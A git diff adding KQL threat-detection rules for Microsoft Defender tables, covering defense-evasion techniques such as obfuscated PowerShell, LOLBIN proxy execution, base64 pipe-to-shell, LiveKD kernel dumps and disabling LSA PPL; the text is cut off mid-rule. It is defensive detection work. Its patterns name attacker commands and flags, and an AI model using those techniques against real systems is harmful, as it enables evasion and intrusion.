Description: Detects Obfuscated Powershell via Stdin in Scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*"" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql new file mode 100644 index 00000000..53a7e851 --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation Via Use Clip +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-09 +// Level: high +// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql new file mode 100644 index 00000000..320b20d7 --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation Via Use MSHTA +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-08 +// Level: high +// Description: Detects Obfuscated Powershell via use MSHTA in Scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql new file mode 100644 index 00000000..fea3d976 --- /dev/null +++ b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql @@ -0,0 +1,14 @@ +// Title: JScript Compiler Execution +// Author: frack113 +// Date: 2022-05-02 +// Level: low +// Description: Detects the execution of the "jsc.exe" (JScript Compiler). +Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use to compile JScript by developers. + +DeviceProcessEvents +| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql new file mode 100644 index 00000000..cd771809 --- /dev/null +++ b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql @@ -0,0 +1,10 @@ +// Title: Kavremover Dropped Binary LOLBIN Usage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-01 +// Level: high +// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\cleanapi.exe" or InitiatingProcessFolderPath endswith "\\kavremover.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql new file mode 100644 index 00000000..4c4ad593 --- /dev/null +++ b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql @@ -0,0 +1,12 @@ +// Title: Kernel Memory Dump Via LiveKD +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: high +// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely in production environment + +DeviceProcessEvents +| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m" or ProcessCommandLine contains " –m" or ProcessCommandLine contains " —m" or ProcessCommandLine contains " ―m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql new file mode 100644 index 00000000..1be53fa6 --- /dev/null +++ b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql @@ -0,0 +1,12 @@ +// Title: Launch-VsDevShell.PS1 Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216.001 +// False Positives: +// - Legitimate usage of the script by a developer + +DeviceProcessEvents +| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql new file mode 100644 index 00000000..0b5b55cf --- /dev/null +++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql @@ -0,0 +1,10 @@ +// Title: Legitimate Application Dropped Archive +// Author: frack113, Florian Roth +// Date: 2022-08-21 +// Level: high +// Description: Detects programs on a Windows system that should not write an archive to disk +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql new file mode 100644 index 00000000..ae11a00a --- /dev/null +++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql @@ -0,0 +1,10 @@ +// Title: Legitimate Application Dropped Executable +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-08-21 +// Level: high +// Description: Detects programs on a Windows system that should not write executables to disk +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql new file mode 100644 index 00000000..33903996 --- /dev/null +++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql @@ -0,0 +1,10 @@ +// Title: Legitimate Application Dropped Script +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-08-21 +// Level: high +// Description: Detects programs on a Windows system that should not write scripts to disk +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql new file mode 100644 index 00000000..190919e4 --- /dev/null +++ b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql @@ -0,0 +1,12 @@ +// Title: Linux Base64 Encoded Pipe to Shell +// Author: pH-T (Nextron Systems) +// Date: 2022-07-26 +// Level: medium +// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "base64 " and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith " |sh" or ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql new file mode 100644 index 00000000..fc0293f8 --- /dev/null +++ b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql @@ -0,0 +1,12 @@ +// Title: Linux Base64 Encoded Shebang In CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "IyEvYmluL2Jhc2" or ProcessCommandLine contains "IyEvYmluL2Rhc2" or ProcessCommandLine contains "IyEvYmluL3pza" or ProcessCommandLine contains "IyEvYmluL2Zpc2" or ProcessCommandLine contains "IyEvYmluL3No" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql new file mode 100644 index 00000000..52ea8311 --- /dev/null +++ b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Linux Doas Conf File Creation +// Author: Sittikorn S, Teoderick Contreras +// Date: 2022-01-20 +// Level: medium +// Description: Detects the creation of doas.conf file in linux host platform. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "/etc/doas.conf" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql new file mode 100644 index 00000000..5d86ef35 --- /dev/null +++ b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: Linux Doas Tool Execution +// Author: Sittikorn S, Teoderick Contreras +// Date: 2022-01-20 +// Level: low +// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "/doas" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_package_uninstall.kql b/KQL/rules/Defense Evasion/linux_package_uninstall.kql new file mode 100644 index 00000000..cd19f090 --- /dev/null +++ b/KQL/rules/Defense Evasion/linux_package_uninstall.kql @@ -0,0 +1,12 @@ +// Title: Linux Package Uninstall +// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: low +// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). + +DeviceProcessEvents +| where ((ProcessCommandLine contains "remove" or ProcessCommandLine contains "purge") and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--remove " or ProcessCommandLine contains " -r ") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains " -e " and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "erase" or ProcessCommandLine contains "remove") and FolderPath endswith "/yum") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql new file mode 100644 index 00000000..0131181d --- /dev/null +++ b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql @@ -0,0 +1,12 @@ +// Title: Linux Shell Pipe to Shell +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-14 +// Level: medium +// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 +// False Positives: +// - Legitimate software that uses these patterns + +DeviceProcessEvents +| where (ProcessCommandLine startswith "sh -c " or ProcessCommandLine startswith "bash -c ") and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash" or ProcessCommandLine endswith " |sh")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation.kql b/KQL/rules/Defense Evasion/livekd_driver_creation.kql new file mode 100644 index 00000000..bc4f6a1c --- /dev/null +++ b/KQL/rules/Defense Evasion/livekd_driver_creation.kql @@ -0,0 +1,12 @@ +// Title: LiveKD Driver Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: medium +// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Legitimate usage of LiveKD for debugging purposes will also trigger this + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql new file mode 100644 index 00000000..b9eca040 --- /dev/null +++ b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql @@ -0,0 +1,12 @@ +// Title: LiveKD Driver Creation By Uncommon Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: high +// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter + +DeviceFileEvents +| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql new file mode 100644 index 00000000..a424efd2 --- /dev/null +++ b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql @@ -0,0 +1,12 @@ +// Title: LiveKD Kernel Memory Dump File Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: high +// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary. + +DeviceFileEvents +| where FolderPath =~ "C:\\Windows\\livekd.dmp" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql new file mode 100644 index 00000000..14e66001 --- /dev/null +++ b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql @@ -0,0 +1,11 @@ +// Title: LOL-Binary Copied From System Directory +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-29 +// Level: high +// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql new file mode 100644 index 00000000..742abfac --- /dev/null +++ b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql @@ -0,0 +1,10 @@ +// Title: Lolbin Runexehelper Use As Proxy +// Author: frack113 +// Date: 2022-12-29 +// Level: medium +// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\runexehelper.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql new file mode 100644 index 00000000..0a173df7 --- /dev/null +++ b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql @@ -0,0 +1,10 @@ +// Title: Lolbin Unregmp2.exe Use As Proxy +// Author: frack113 +// Date: 2022-12-29 +// Level: medium +// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -HideWMP" or ProcessCommandLine contains " /HideWMP" or ProcessCommandLine contains " –HideWMP" or ProcessCommandLine contains " —HideWMP" or ProcessCommandLine contains " ―HideWMP") and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql new file mode 100644 index 00000000..8f9f4436 --- /dev/null +++ b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: LSA PPL Protection Disabled Via Reg.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-22 +// Level: high +// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql new file mode 100644 index 00000000..13072f91 --- /dev/null +++ b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql @@ -0,0 +1,15 @@ +// Title: Malicious PE Execution by Microsoft Visual Studio Debugger +// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community +// Date: 2020-10-14 +// Level: medium +// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. +This option may be used adversaries to execute malicious code by signed verified binary. +The debugger is installed alongside with Microsoft Visual Studio package. + +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218, attack.defense-evasion +// False Positives: +// - The process spawned by vsjitdebugger.exe is uncommon. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql new file mode 100644 index 00000000..1c7fddea --- /dev/null +++ b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql @@ -0,0 +1,14 @@ +// Title: Malicious Windows Script Components File Execution by TAEF Detection +// Author: Agro (@agro_sev) oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces +Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - It's not an uncommon to use te.exe directly to execute legal TAEF tests + +DeviceProcessEvents +| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql new file mode 100644 index 00000000..60e245fe --- /dev/null +++ b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql @@ -0,0 +1,10 @@ +// Title: Mavinject Inject DLL Into Running Process +// Author: frack113, Florian Roth +// Date: 2021-07-12 +// Level: high +// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 + +DeviceProcessEvents +| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql new file mode 100644 index 00000000..e8faa924 --- /dev/null +++ b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql @@ -0,0 +1,13 @@ +// Title: MaxMpxCt Registry Value Changed +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-19 +// Level: low +// Description: Detects changes to the "MaxMpxCt" registry value. +MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. +Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql new file mode 100644 index 00000000..e359d1c3 --- /dev/null +++ b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Office DLL Sideload +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: high +// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql new file mode 100644 index 00000000..1d5faa31 --- /dev/null +++ b/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Office Protected View Disabled +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-06-08 +// Level: high +// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Security\\ProtectedView*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql new file mode 100644 index 00000000..db6d28de --- /dev/null +++ b/KQL/rules/Defense Evasion/modify_group_policy_settings.kql @@ -0,0 +1,12 @@ +// Title: Modify Group Policy Settings +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains 